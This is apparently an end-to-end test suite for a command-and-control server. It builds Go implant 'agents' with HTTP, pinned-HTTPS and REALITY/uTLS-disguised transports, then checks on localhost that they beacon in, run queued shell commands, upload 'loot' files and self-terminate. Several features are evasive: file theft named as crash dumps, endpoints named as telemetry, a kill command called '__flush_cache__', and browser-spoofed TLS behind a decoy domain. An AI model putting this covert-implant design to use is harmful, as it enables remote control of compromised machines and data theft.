"""End-to-end transport and compilation validation suite.

Validates:
1. /api/build route and artifact generation across all three transport modes:
   - HTTP (direct)
   - HTTPS + Certificate Pinning (SPKI SHA-256)
   - REALITY (uTLS browser spoofing + VLESS tunnel)
   Verifies HTTP 200 responses, database metadata, executable permissions (0o700),
   and ELF binary header bytes (magic \x7fELF, 64-bit, little-endian, AMD64 architecture).
2. Live HTTP transport session using artifact generated by /api/build:
   - Real compiled Go agent binary running on Linux
   - Initial encrypted checkin and registration in SQLite DB with matching build_id
   - Task dispatch and command execution result reporting
   - File upload (loot) via SubmitCrashDump with byte-for-byte integrity
   - Clean self-termination via FlushCommand (__flush_cache__)
3. Live HTTPS Pinned transport session:
   - Positive control: Valid SPKI SHA-256 pin completes TLS handshake, checkin, and task dispatch
   - Negative control: Registered build with mismatched pin is rejected at TLS handshake
     and creates zero agent records. A generated-config client test also captures
     the explicit certificate-pin mismatch error.
4. REALITY package unit tests:
   - Executes agent/funcs/reality package tests (VLESS framing, transport, REALITY cert verification).
   - Note: QA-01b (live REALITY client-server session) remains an open evidence gap
     because no local Xray/REALITY server binary exists in this environment.
"""

import datetime
import importlib
import io
import json
import os
from pathlib import Path
import shutil
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from unittest.mock import patch
from werkzeug.serving import make_server

# Setup paths
SERVER_DIR = Path(__file__).parent.resolve()
PROJECT_ROOT = SERVER_DIR.parent
AGENT_DIR = PROJECT_ROOT / "agent"


def find_free_port() -> int:
    """Return an available ephemeral TCP port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


class EndToEndTransportTests(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        cls.temp_dir = tempfile.TemporaryDirectory()
        cls.addClassCleanup(cls.temp_dir.cleanup)
        previous_sys_path = sys.path[:]
        cls.addClassCleanup(lambda: sys.path.__setitem__(slice(None), previous_sys_path))
        sys.path.insert(0, str(SERVER_DIR))

        # Set up isolated test DB and storage
        cls.test_db_path = (Path(cls.temp_dir.name) / "test_e2e.db").resolve()
        previous_db_env = os.environ.get("C2_DB_PATH")
        previous_database = sys.modules.get("database")
        previous_db_path = getattr(previous_database, "DB_PATH", None)
        previous_app = sys.modules.get("app")
        previous_app_state = {
            name: getattr(previous_app, name, None)
            for name in ("LOOT_DIR", "BUILDS_DIR", "STAGED_DIR", "CERTS_DIR", "API_KEY",
                         "AGENT_PATH_CHECKIN", "AGENT_PATH_RESULT",
                         "AGENT_PATH_UPLOAD", "AGENT_PATH_FILES", "_agent_paths",
                         "get_db_connection", "private_directory", "app")
        } if previous_app is not None else {}

        def restore_modules():
            if previous_db_env is None:
                os.environ.pop("C2_DB_PATH", None)
            else:
                os.environ["C2_DB_PATH"] = previous_db_env
            if previous_database is None:
                sys.modules.pop("database", None)
            else:
                previous_database.DB_PATH = previous_db_path
            if previous_app is None:
                sys.modules.pop("app", None)
            else:
                for name, value in previous_app_state.items():
                    setattr(previous_app, name, value)

        cls.addClassCleanup(restore_modules)
        os.environ["C2_DB_PATH"] = str(cls.test_db_path)

        if "database" in sys.modules:
            cls.database = importlib.reload(sys.modules["database"])
        else:
            cls.database = importlib.import_module("database")
        cls._assert_test_database()
        cls.database.init_db()

        cls.crypto = importlib.import_module("crypto")
        storage = importlib.import_module("storage_permissions")
        private_directory = storage.private_directory
        with patch.object(storage, "private_directory", side_effect=lambda path, **kwargs:
                          private_directory(Path(cls.temp_dir.name) / Path(path).name, **kwargs)):
            if "app" in sys.modules:
                cls.server_app = importlib.reload(sys.modules["app"])
            else:
                cls.server_app = importlib.import_module("app")
        if cls.server_app.get_db_connection is not cls.database.get_db_connection:
            raise RuntimeError("Refusing cached app with a different database connection")
        cls.gen_cert = importlib.import_module("gen_cert")

        # Redirect server storage paths to temp dir
        cls.loot_dir = Path(cls.temp_dir.name) / "loot"
        cls.loot_dir.mkdir(exist_ok=True, mode=0o700)
        cls.builds_dir = Path(cls.temp_dir.name) / "builds"
        cls.builds_dir.mkdir(exist_ok=True, mode=0o700)
        cls.staged_dir = Path(cls.temp_dir.name) / "staged"
        cls.staged_dir.mkdir(exist_ok=True, mode=0o700)
        cls.certs_dir = Path(cls.temp_dir.name) / "certs"
        cls.certs_dir.mkdir(exist_ok=True, mode=0o700)

        cls.server_app.LOOT_DIR = str(cls.loot_dir)
        cls.server_app.BUILDS_DIR = str(cls.builds_dir)
        cls.server_app.STAGED_DIR = str(cls.staged_dir)
        cls.server_app.CERTS_DIR = str(cls.certs_dir)

        # Generate default certificate and key for HTTPS tests
        key, cert = cls.gen_cert.generate_certificate("127.0.0.1", ["127.0.0.1"], ["localhost"], 30)
        cls.default_cert = cert
        cls.default_key = key
        cls.default_spki_pin = cls.gen_cert.compute_spki_pin(cert)

        from cryptography.hazmat.primitives import serialization
        (cls.certs_dir / "server.crt").write_bytes(cert.public_bytes(serialization.Encoding.PEM))
        (cls.certs_dir / "server.key").write_bytes(key.private_bytes(
            serialization.Encoding.PEM,
            serialization.PrivateFormat.TraditionalOpenSSL,
            serialization.NoEncryption(),
        ))

    @classmethod
    def _assert_test_database(cls):
        if Path(cls.database.DB_PATH).resolve() != cls.test_db_path:
            raise RuntimeError("Refusing to modify a database outside this test's temporary directory")

    def setUp(self):
        # Reset DB tables between tests
        self._assert_test_database()
        conn = self.database.get_db_connection()
        for t in ("results", "tasks", "agents", "loot", "staged_files", "builds", "seen_nonces"):
            conn.execute(f"DELETE FROM {t}")
        conn.commit()
        conn.close()

    def test_01_api_build_generates_elf_artifacts_for_all_three_modes(self):
        """Exercise /api/build for HTTP, HTTPS pinned, and REALITY; inspect ELF headers and metadata."""
        client = self.server_app.app.test_client()
        sizes = {}
        modes = [
            ("http", {
                "server_url": "http://127.0.0.1:5000",
            }),
            ("https_pinned", {
                "server_url": "https://127.0.0.1:5000",
            }),
            ("reality", {
                "server_url": "http://127.0.0.1:5000",
                "reality_vps_addr": "127.0.0.1:8443",
                "decoy_domain": "example.com",
                "reality_pubkey": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
                "reality_shortid": "0123456789abcdef",
                "vless_uuid": "00000000-0000-4000-8000-000000000001",
            }),
        ]

        for mode, extra in modes:
            payload = {
                "target_os": "linux",
                "arch": "amd64",
                "server_url": extra["server_url"],
                "jitter_min": "1",
                "jitter_max": "2",
                "persist_method": "none",
                "profile_id": 1,
                "locale": "en-US,en;q=0.9",
                "transport_mode": mode,
            }
            if mode == "reality":
                payload.update({
                    "reality_vps_addr": extra["reality_vps_addr"],
                    "decoy_domain": extra["decoy_domain"],
                    "reality_pubkey": extra["reality_pubkey"],
                    "reality_shortid": extra["reality_shortid"],
                    "vless_uuid": extra["vless_uuid"],
                })

            resp = client.post(
                "/api/build",
                headers={"X-API-Key": self.server_app.API_KEY},
                json=payload,
            )
            self.assertEqual(resp.status_code, 200, f"/api/build failed for {mode}: {resp.get_data(as_text=True)}")
            build_data = resp.get_json()
            self.assertEqual(build_data["status"], "ok")
            self.assertEqual(build_data["transport_mode"], mode)
            if mode == "https_pinned":
                self.assertTrue(build_data["tls_pinned"])
                self.assertIsNotNone(build_data["cert_pin_prefix"])
            elif mode == "reality":
                self.assertEqual(build_data["decoy_domain"], "example.com")
            else:
                self.assertFalse(build_data["tls_pinned"])

            build_id = build_data["build_id"]
            conn = self.database.get_db_connection()
            build_row = conn.execute("SELECT * FROM builds WHERE id = ?", (build_id,)).fetchone()
            conn.close()

            self.assertIsNotNone(build_row)
            self.assertEqual(build_row["target_os"], "linux")
            self.assertEqual(build_row["arch"], "amd64")
            self.assertEqual(build_row["transport_mode"], mode)

            artifact_path = Path(build_row["file_path"])
            self.assertTrue(artifact_path.exists())
            self.assertTrue(os.access(artifact_path, os.X_OK))

            # Permissions: owner-only executable 0o700
            file_mode = artifact_path.stat().st_mode & 0o777
            self.assertEqual(file_mode, 0o700)

            # Inspect ELF header bytes
            elf_header = artifact_path.read_bytes()[:64]
            # ELF magic: \x7fELF
            self.assertEqual(elf_header[:4], b"\x7fELF", f"Artifact for {mode} lacks ELF magic")
            # EI_CLASS: 2 = 64-bit architecture
            self.assertEqual(elf_header[4], 2, f"Artifact for {mode} is not 64-bit ELF")
            # EI_DATA: 1 = 2's complement, little endian
            self.assertEqual(elf_header[5], 1, f"Artifact for {mode} is not little-endian")
            # EI_VERSION: 1 = EV_CURRENT
            self.assertEqual(elf_header[6], 1)
            # e_type: 2 = ET_EXEC or 3 = ET_DYN (position-independent executable)
            e_type = int.from_bytes(elf_header[16:18], byteorder="little")
            self.assertIn(e_type, (2, 3), f"Artifact for {mode} is not executable ELF type")
            # e_machine: 0x3E (62) = AMD x86-64
            e_machine = int.from_bytes(elf_header[18:20], byteorder="little")
            self.assertEqual(e_machine, 0x3E, f"Artifact for {mode} is not AMD64 machine type")

            sz = artifact_path.stat().st_size
            sizes[mode] = sz
            self.assertGreater(sz, 5_000_000, f"Binary for {mode} unexpectedly small: {sz}")

        # REALITY binary includes uTLS and reality package so it is larger than HTTP
        self.assertGreater(sizes["reality"], sizes["http"])

    def test_02_e2e_http_transport_session(self):
        """Live HTTP session: agent generated via /api/build checks in, executes task, uploads loot, and terminates cleanly."""
        port = find_free_port()
        server = make_server("127.0.0.1", port, self.server_app.app, threaded=True)
        server_thread = threading.Thread(target=server.serve_forever, daemon=True)
        server_thread.start()
        self.addCleanup(server.shutdown)

        server_url = f"http://127.0.0.1:{port}"

        # Generate agent using /api/build route against live server URL
        client = self.server_app.app.test_client()
        resp = client.post(
            "/api/build",
            headers={"X-API-Key": self.server_app.API_KEY},
            json={
                "target_os": "linux",
                "arch": "amd64",
                "server_url": server_url,
                "jitter_min": "1",
                "jitter_max": "2",
                "persist_method": "none",
                "profile_id": 1,
                "locale": "en-US,en;q=0.9",
                "transport_mode": "http",
            },
        )
        self.assertEqual(resp.status_code, 200, f"/api/build failed: {resp.get_data(as_text=True)}")
        build_id = resp.get_json()["build_id"]

        conn = self.database.get_db_connection()
        build_row = conn.execute("SELECT * FROM builds WHERE id = ?", (build_id,)).fetchone()
        conn.close()

        agent_bin = Path(build_row["file_path"])
        self.assertTrue(agent_bin.exists())
        self.assertTrue(os.access(agent_bin, os.X_OK))
        key_id = build_row["key_id"]

        # Start live agent process generated by /api/build
        agent_env = os.environ.copy()
        agent_env["XDG_CONFIG_HOME"] = str(Path(self.temp_dir.name) / "http_agent_config")
        proc = subprocess.Popen([str(agent_bin)], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=agent_env)
        self.addCleanup(lambda: proc.poll() is None and proc.terminate())

        # Wait for agent checkin
        agent_record = None
        for _ in range(50):
            conn = self.database.get_db_connection()
            rows = conn.execute("SELECT * FROM agents WHERE key_id = ?", (key_id,)).fetchall()
            conn.close()
            if rows:
                agent_record = dict(rows[0])
                break
            time.sleep(0.2)

        self.assertIsNotNone(agent_record, "Agent failed to check in within 10s")
        agent_id = agent_record["id"]
        self.assertEqual(agent_record["build_id"], build_id)

        # 1. Queue a shell command task
        conn = self.database.get_db_connection()
        cursor = conn.execute(
            "INSERT INTO tasks (agent_id, command, status) VALUES (?, 'echo e2e-http-verified', 'pending')",
            (agent_id,),
        )
        task_id = cursor.lastrowid
        conn.commit()
        conn.close()

        # Wait for task execution and result submission
        result_record = None
        for _ in range(50):
            conn = self.database.get_db_connection()
            rows = conn.execute("SELECT * FROM results WHERE task_id = ?", (task_id,)).fetchall()
            conn.close()
            if rows:
                result_record = dict(rows[0])
                break
            time.sleep(0.2)

        self.assertIsNotNone(result_record, "Task result was not received within 10s")
        self.assertIn("e2e-http-verified", result_record["output"])

        # 2. Test file upload via get command
        tmp_loot_dir = Path(self.temp_dir.name) / "e2e_http_loot"
        tmp_loot_dir.mkdir(exist_ok=True)
        test_file_path = tmp_loot_dir / "loot_test.txt"
        test_file_content = b"E2E test loot payload with verified bytes: " + os.urandom(64)
        with open(test_file_path, "wb") as f:
            f.write(test_file_content)

        conn = self.database.get_db_connection()
        cursor = conn.execute(
            "INSERT INTO tasks (agent_id, command, status) VALUES (?, ?, 'pending')",
            (agent_id, f"get {test_file_path}"),
        )
        get_task_id = cursor.lastrowid
        conn.commit()
        conn.close()

        loot_record = None
        for _ in range(50):
            conn = self.database.get_db_connection()
            rows = conn.execute("SELECT * FROM loot WHERE agent_id = ?", (agent_id,)).fetchall()
            conn.close()
            if rows:
                loot_record = dict(rows[0])
                break
            time.sleep(0.2)

        self.assertIsNotNone(loot_record, "Loot upload record not received within 10s")
        saved_loot_file = Path(loot_record["file_path"])
        self.assertTrue(saved_loot_file.exists())
        self.assertEqual(saved_loot_file.read_bytes(), test_file_content)

        # 3. Clean termination: queue FlushCommand (__flush_cache__)
        conn = self.database.get_db_connection()
        conn.execute(
            "INSERT INTO tasks (agent_id, command, status) VALUES (?, '__flush_cache__', 'pending')",
            (agent_id,),
        )
        conn.commit()
        conn.close()

        # Agent should acknowledge and exit
        proc.wait(timeout=10)
        self.assertEqual(proc.returncode, 0)
        if proc.stdout:
            proc.stdout.close()
        if proc.stderr:
            proc.stderr.close()

    def test_03_e2e_https_pinned_transport_session(self):
        """Live HTTPS pinned session: positive control succeeds; registered build with mismatched pin is rejected at TLS handshake."""
        # Certificate setup
        cert_path = self.certs_dir / "server.crt"
        key_path = self.certs_dir / "server.key"
        pin = self.default_spki_pin

        import ssl
        ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        ssl_ctx.load_cert_chain(certfile=str(cert_path), keyfile=str(key_path))

        port = find_free_port()
        server = make_server("127.0.0.1", port, self.server_app.app, ssl_context=ssl_ctx, threaded=True)
        server_thread = threading.Thread(target=server.serve_forever, daemon=True)
        server_thread.start()
        self.addCleanup(server.shutdown)

        server_url = f"https://127.0.0.1:{port}"

        # Subtest 3A: Positive control with valid pin generated via /api/build
        client = self.server_app.app.test_client()
        resp = client.post(
            "/api/build",
            headers={"X-API-Key": self.server_app.API_KEY},
            json={
                "target_os": "linux",
                "arch": "amd64",
                "server_url": server_url,
                "jitter_min": "1",
                "jitter_max": "2",
                "persist_method": "none",
                "profile_id": 1,
                "locale": "en-US,en;q=0.9",
                "transport_mode": "https_pinned",
            },
        )
        self.assertEqual(resp.status_code, 200, f"/api/build failed: {resp.get_data(as_text=True)}")
        build_id = resp.get_json()["build_id"]

        conn = self.database.get_db_connection()
        build_row = conn.execute("SELECT * FROM builds WHERE id = ?", (build_id,)).fetchone()
        conn.close()

        key_id = build_row["key_id"]
        agent_bin = Path(build_row["file_path"])

        agent_env = os.environ.copy()
        agent_env["XDG_CONFIG_HOME"] = str(Path(self.temp_dir.name) / "https_agent_config")
        proc = subprocess.Popen([str(agent_bin)], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=agent_env)
        self.addCleanup(lambda: proc.poll() is None and proc.terminate())

        # Wait for HTTPS checkin
        agent_record = None
        for _ in range(50):
            conn = self.database.get_db_connection()
            rows = conn.execute("SELECT * FROM agents WHERE key_id = ?", (key_id,)).fetchall()
            conn.close()
            if rows:
                agent_record = dict(rows[0])
                break
            time.sleep(0.2)

        self.assertIsNotNone(agent_record, "Pinned agent failed to check in over HTTPS")
        agent_id = agent_record["id"]
        self.assertEqual(agent_record["build_id"], build_id)

        # Terminate valid pinned agent cleanly
        conn = self.database.get_db_connection()
        conn.execute("INSERT INTO tasks (agent_id, command, status) VALUES (?, '__flush_cache__', 'pending')", (agent_id,))
        conn.commit()
        conn.close()
        proc.wait(timeout=10)
        if proc.stdout:
            proc.stdout.close()
        if proc.stderr:
            proc.stderr.close()

        # Subtest 3B: Negative control with mismatched pin on a REGISTERED build.
        # This build key is registered in the database, ensuring that
        # absence of registration is an observation; the generated-config test
        # below separately checks the client-side reason for rejection.
        bad_pin = "f" * 64
        key_hex_bad, key_id_bad = self.crypto.generate_key()

        conn = self.database.get_db_connection()
        conn.execute(
            "INSERT INTO builds (filename, target_os, arch, server_url, callback_interval, file_path, key_id, encryption_key, cert_pin, transport_mode) "
            "VALUES ('agent_bad_pin', 'linux', 'amd64', ?, '1s-1s', '/tmp/agent_bad_pin', ?, ?, ?, 'https_pinned')",
            (server_url, key_id_bad, key_hex_bad, bad_pin),
        )
        conn.commit()
        conn.close()

        tmp_bad_dir = Path(self.temp_dir.name) / "e2e_agent_bad_pin"
        tmp_bad_dir.mkdir(exist_ok=True)
        tmp_bad_src = tmp_bad_dir / "agent"
        shutil.copytree(AGENT_DIR, tmp_bad_src)

        cfg_bad = self.server_app._generate_config_go(
            server_url=server_url,
            jitter_min=1,
            jitter_max=1,
            persist_method="none",
            profile_id=1,
            locale="en-US,en;q=0.9",
            key_hex=key_hex_bad,
            key_id=key_id_bad,
            path_checkin=self.server_app.AGENT_PATH_CHECKIN,
            path_result=self.server_app.AGENT_PATH_RESULT,
            path_upload=self.server_app.AGENT_PATH_UPLOAD,
            path_files=self.server_app.AGENT_PATH_FILES + "/",
            cert_pin=bad_pin,
            transport_mode="https_pinned",
        )
        with open(tmp_bad_src / "config.go", "w", encoding="utf-8") as f:
            f.write(cfg_bad)

        bad_bin = tmp_bad_dir / "agent_bad_pin"
        env = os.environ.copy()
        env["CGO_ENABLED"] = "0"
        res = subprocess.run(
            ["go", "build", "-buildvcs=false", "-trimpath", "-ldflags", "-s -w -buildid=", "-o", str(bad_bin), "."],
            cwd=tmp_bad_src,
            env=env,
            capture_output=True,
            text=True,
            timeout=120,
        )
        self.assertEqual(res.returncode, 0)

        bad_env = os.environ.copy()
        bad_env["XDG_CONFIG_HOME"] = str(Path(self.temp_dir.name) / "bad_pin_agent_config")
        bad_proc = subprocess.Popen([str(bad_bin)], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=bad_env)
        try:
            # Let it attempt connections for 3 seconds
            time.sleep(3)
            # Verify no record appeared for this registered build key.
            conn = self.database.get_db_connection()
            rows = conn.execute("SELECT * FROM agents WHERE key_id = ?", (key_id_bad,)).fetchall()
            conn.close()
            self.assertEqual(len(rows), 0, "Registered build with mismatched pin must be rejected at TLS handshake and leave zero agent records")
        finally:
            bad_proc.terminate()
            bad_proc.wait(timeout=5)
            if bad_proc.stdout:
                bad_proc.stdout.close()
            if bad_proc.stderr:
                bad_proc.stderr.close()

        # Exercise the same generated initializer and HTTP client while exposing
        # the error to the test instead of relying only on absent database rows.
        (tmp_bad_src / "pin_rejection_test.go").write_text('''package main

import (
    "net/http"
    "strings"
    "testing"
    "time"
)

func TestGeneratedClientReportsPinMismatch(t *testing.T) {
    InitializeTelemetry()
    http.DefaultClient.Timeout = 5 * time.Second
    response, err := http.DefaultClient.Get(TelemetryEndpoint)
    if response != nil { response.Body.Close() }
    if err == nil || !strings.Contains(err.Error(), "certificate pin mismatch") {
        t.Fatalf("expected certificate pin mismatch, got %v", err)
    }
    t.Log("Observed client certificate pin mismatch")
}
''', encoding="utf-8")
        observed = subprocess.run(
            ["go", "test", "-count=1", "-v", "-run", "^TestGeneratedClientReportsPinMismatch$", "."],
            cwd=tmp_bad_src, env=env, capture_output=True, text=True, timeout=120,
        )
        self.assertEqual(observed.returncode, 0, observed.stdout + observed.stderr)
        self.assertIn("Observed client certificate pin mismatch", observed.stdout)

    def test_04_reality_package_tests_execute_cleanly(self):
        """Execute full Go test suite for the REALITY transport package."""
        res = subprocess.run(
            ["go", "test", "-v", "-count=1", "./funcs/reality"],
            cwd=str(AGENT_DIR),
            capture_output=True,
            text=True,
            timeout=60,
        )
        self.assertEqual(res.returncode, 0, f"REALITY package tests failed:\nSTDOUT:\n{res.stdout}\nSTDERR:\n{res.stderr}")
        self.assertIn("PASS", res.stdout)
        self.assertIn("TestVLESSRequest_Valid", res.stdout)
        self.assertIn("TestVlessConn_HTTPRoundTrip", res.stdout)
        self.assertIn("TestVerifyPeerCertificate_ForgedRealityCert", res.stdout)
        self.assertIn("TestSessionIDLayoutAndRoundtrip", res.stdout)


if __name__ == "__main__":
    unittest.main()
